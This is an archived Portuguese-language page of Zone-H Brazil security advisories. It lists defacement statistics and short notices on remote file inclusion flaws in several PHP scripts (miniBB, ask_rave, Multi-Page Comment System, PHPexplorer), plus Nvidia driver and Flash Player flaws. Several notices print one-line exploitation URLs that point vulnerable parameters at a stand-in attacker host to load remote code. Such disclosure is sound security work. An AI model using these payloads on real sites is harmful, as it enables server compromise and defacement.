Zone-H Advertisement
Home arrow Avisos de Segurança
24 de julho de 2008
  
 
Ataques desta semana
O.S.  Defs.  %
Linux  4781  66.99%
Win 2003  1787  25.04%
Win 2000  297  4.16%
FreeBSD  140  1.96%
MacOSX  67  0.94%
Other  65  0.91%

Total de ataques: 7137 dos quais 2642 único(s) no ip e 4495 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Avisos de Segurança
miniBB: Inclusão de Arquivos Remotos PDF Imprimir E-mail
Avaliação do Usuário: / 0
26 de outubro de 2006
Nome do Script: miniBB
Site do script: http://www.minibb.net/download.html
Versão Afetada: v.2.0.2

Encontrado pelo Polonês Kacper (a.k.a Rahim)
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

http://www.site.com/[miniBB_path]/bb_func_txt.php?pathToFiles=[CMD]
 
Falha de Buffer overflow no driver da Nvidia PDF Imprimir E-mail
Avaliação do Usuário: / 2
Por Alan Gurgel (hipn0s)   
26 de outubro de 2006
nvideaFoi informado pela empresa de segurança Rapid7 que uma falha de segurança nos drivers Nvidia utilizado por muitos sistemas linux possibilitam que usuários mal intencionados comprometam todo o computador através dos drivers usados pelo adaptador gráfico da companhia.

O que faz com que a briga contra drivers proprietários aumente ainda mais, a vulnerabilidade é de conhecimento interno desde dezembro de 2004, mas remanesce vulnerável, a falha possibilita acesso completo de root , acionável localmente ou via uma conexão remota utilizando um exploit público...

Leia mais...
 
Ask_Rave: Inclusão de Arquivos Remotos PDF Imprimir E-mail
Avaliação do Usuário: / 0
26 de outubro de 2006
Nome do Script: ask_rave
Site do script: http://rave.jk-digital.com/site/scripts/files/ask_0_9PR.zip
Versão Afetada: 0.9 PR

Encontrado por v1per-haCker
Email: v1per-hacker[at]hotmail.com

Exploração:

http://localhost/path/end.php?footfile=http://EvElCoDe.txt?
 
MPS: Multiplas Falhas de Inclusão de Arquivos Remotos PDF Imprimir E-mail
Avaliação do Usuário: / 0
26 de outubro de 2006
Nome do Script: Multi-Page Comment System
Site do script: http://tpvgames.co.uk/web/mpcs/
Versão Afetada: 1.0.0

Encontrado por v1per-haCker
Email: v1per-hacker[at]hotmail.com

Exploração:

http://localhost/path/include.php?path=http://EvElCoDe.txt?
http://localhost/path/functions.php?path=http://EvElCoDe.txt?
 
R7-0026: Falha de injeção no cabeçalho do plugin do Flash Player PDF Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
20 de outubro de 2006

O grupo de pesquisa Rapid7 descobriu duas falhas no plugin do flash player que pode ser usada por crackers para comprometer remotamente um usuário que tenha a versão com falha deste plugin.

1 - Versões afetadas
   Versões verificadas

  • Flash Player plugin 9.0.16 (para Windows)
  • Flash Player plugin 7.0.63 (para Linux)




Versões provávelmente afetadas

  • Anteriores a 9.0.x e 7.x
  • Versões 8.x



Versão corrigida
  • Flash Player plugin BETA version 9.0.18d60 (para Windows)


Aviso original
 
PHPexplorer: Inclusão de arquivos remotos PDF Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
20 de outubro de 2006
Kacper descobriu uma falha de segurança no módulo PH PExplorer, a qual pode ser usada para inclusão de arquivos remotos.
O parametro de verificação "Language" em explorer_load_lang.php não é corretamente verificado e pode ser usado para inclusão de arquivos maliciosos.
 
Esta falha foi confirmada na versão 0.24 e talvez versões anteriores também sejam afetadas.
Solução: Edite o código fonte para colocar o parametro de inclusão corretamente e coloque o "register_globals" para Off.
Aviso original
 
Mais...
<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>

Resultados 157 - 182 de 231
[Voltar]
 
Top!
(C) 2008 Zone-H - Informação sem restrição
Top!